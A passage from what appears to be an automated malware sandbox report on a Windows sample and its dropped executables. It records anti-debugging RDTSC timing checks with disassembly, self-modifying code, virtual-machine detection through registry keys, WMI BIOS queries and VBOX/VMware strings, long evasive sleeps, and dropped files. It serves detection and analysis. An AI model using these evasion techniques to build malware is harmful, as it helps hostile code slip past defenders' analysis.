0x00000051 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD31E4 second address: BD31EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD32B8 second address: BD32BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD32BF second address: BD32D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD32D6 second address: BD32DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD32DA second address: BD32E0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD345E second address: BD34C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 call 00007FEDA531E8D1h 0x0000000d jp 00007FEDA531E8CCh 0x00000013 pop esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FEDA531E8C8h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 movzx edx, di 0x00000033 call 00007FEDA531E8C9h 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b jns 00007FEDA531E8C6h 0x00000041 pushad 0x00000042 popad 0x00000043 popad 0x00000044 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD34C1 second address: BD34C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD34C7 second address: BD34CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD34CB second address: BD355A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edi 0x0000000d push eax 0x0000000e jg 00007FEDA51D0EB6h 0x00000014 pop eax 0x00000015 pop edi 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jnc 00007FEDA51D0EC8h 0x00000020 mov eax, dword ptr [eax] 0x00000022 jnc 00007FEDA51D0EC8h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push esi 0x0000002d jmp 00007FEDA51D0EC4h 0x00000032 pop esi 0x00000033 pop eax 0x00000034 and edi, dword ptr [ebp+122D30CDh] 0x0000003a push 00000003h 0x0000003c sub cl, 0000000Fh 0x0000003f push 00000000h 0x00000041 push 00000003h 0x00000043 sub si, 5046h 0x00000048 push B1BBA515h 0x0000004d push eax 0x0000004e push edx 0x0000004f jp 00007FEDA51D0EBCh 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD355A second address: BD355E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BD355E second address: BD359D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EBAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 0E445AEBh 0x00000010 mov dword ptr [ebp+122D28A5h], ecx 0x00000016 mov dword ptr [ebp+122D1CF6h], edi 0x0000001c lea ebx, dword ptr [ebp+12448F57h] 0x00000022 mov dword ptr [ebp+122D3793h], ebx 0x00000028 xchg eax, ebx 0x00000029 pushad 0x0000002a jmp 00007FEDA51D0EBCh 0x0000002f push eax 0x00000030 push edx 0x00000031 push edx 0x00000032 pop edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BE5341 second address: BE5347 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF27C8 second address: BF27E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jng 00007FEDA51D0EB6h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007FEDA51D0EB6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF27E1 second address: BF27E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF27E5 second address: BF27F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007FEDA51D0EB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BC46FC second address: BC4701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF06AC second address: BF06BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 jg 00007FEDA51D0EB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF06BC second address: BF06DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FEDA531E8D6h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF06DD second address: BF06E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF06E1 second address: BF06F6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c jno 00007FEDA531E8C6h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF06F6 second address: BF0719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC3h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FEDA51D0EB6h 0x0000000f jnl 00007FEDA51D0EB6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0871 second address: BF0880 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FEDA531E8C6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0880 second address: BF08AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEDA51D0EC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FEDA51D0EBEh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF08AC second address: BF08B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FEDA531E8C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0A44 second address: BF0A54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FEDA51D0EB6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0A54 second address: BF0A58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0A58 second address: BF0A60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe RDTSC instruction interceptor: First address: BF0C13 second address: BF0C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: FDEB9E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 116D7DB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 11FC58E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Special instruction interceptor: First address: A5DFDD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Special instruction interceptor: First address: A5B007 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Special instruction interceptor: First address: C1DDD9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Special instruction interceptor: First address: BFEF96 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Special instruction interceptor: First address: C83A26 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Special instruction interceptor: First address: 3FECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Special instruction interceptor: First address: 592748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe Special instruction interceptor: First address: 6217AC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: F4ECB9 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 10E2748 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 11717AC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Special instruction interceptor: First address: 1DEB9E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Special instruction interceptor: First address: 36D7DB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Special instruction interceptor: First address: 3FC58E instructions caused by: Self-modifying code
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Memory allocated: 5340000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Memory allocated: 53F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Memory allocated: 5340000 memory reserve | memory write watch Jump to behavior
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Code function: 2_2_00BD31C7 rdtsc 2_2_00BD31C7
Contains functionality to detect virtual machines (SLDT)
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_007EC128 sldt word ptr [eax] 0_3_007EC128
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2079 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 2272 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-BB72E.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RCEE.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-DEVD7.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FANHF.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\nvfvsdksvc_x64.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-GF03F.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\ddETWExternal.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1003145001\1553f88169.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\NVFTVRDLL64.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1003147001\num.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1003146001\661f3ff865.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-5MQTR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-H6BOG.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-FANHF.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-R63KU.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-6RCEE.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\is-7T5A6.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\_isetup\_setup64.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OPEFN.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-BBOTN.tmp\_isetup\_isdecmp.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-1UGLR.tmp\fontcreator.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0PK7I.tmp\is-9EFK3.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\file.exe TID: 3272 Thread sleep time: -150000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7528 Thread sleep count: 105 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7528 Thread sleep time: -210105s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7532 Thread sleep count: 99 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7532 Thread sleep time: -198099s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7492 Thread sleep count: 279 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7492 Thread sleep time: -8370000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7524 Thread sleep count: 107 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7524 Thread sleep time: -214107s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7508 Thread sleep count: 2079 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7508 Thread sleep time: -4160079s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7608 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7520 Thread sleep count: 106 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7520 Thread sleep time: -212106s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7516 Thread sleep count: 2272 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7516 Thread sleep time: -4546272s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe TID: 3352 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe TID: 4556 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe TID: 1052 Thread sleep time: -36018s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe TID: 2848 Thread sleep time: -40020s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe TID: 7380 Thread sleep time: -40020s >= -30000s
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1003144001\9eba8044e7.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\KOLH45MMED0OMDDRYHIG.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FT773VWATWFL9SRK5RTU4.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Comms Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Google Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Packages Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\Mozilla Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\user\AppData\Local\PeerDistRepub Jump to behavior
Source: skotes.exe, skotes.exe, 00000007.00000002.4110473002.00000000010C5000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: fontcreator.tmp, 0000001A.00000002.2480839088.000000000118D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: fontcreator.tmp, 00000009.00000002.2437879792.00000000007ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: skotes.exe, 00000007.00000002.4108997518.00000000006BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\d
Source: fontcreator.tmp, 0000001A.00000002.2480839088.000000000118D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yO
Source: file.exe, 00000000.00000003.1785012541.0000000000798000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1833944782.0000000000798000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW4
Source: file.exe, 00000000.00000003.1785012541.0000000000798000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1833944782.0000000000798000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.0000000000678000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000007.00000002.4108997518.00000000006A8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: fontcreator.tmp, 00000009.00000002.2437879792.00000000007ED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\ys(^
Source: FT773VWATWFL9SRK5RTU4.exe, 00000002.00000002.1981381301.0000000000BD7000.00000040.00000001.01000000.00000006.sdmp, KOLH45MMED0OMDDRYHIG.exe, 00000003.00000002.1900949507.0000000000575000.00000040.00000001.01000000.00000008.sdmp, skotes.exe, 00000004.00000002.1917557344.00000000010C5000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 00000007.00000002.4110473002.00000000010C5000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the 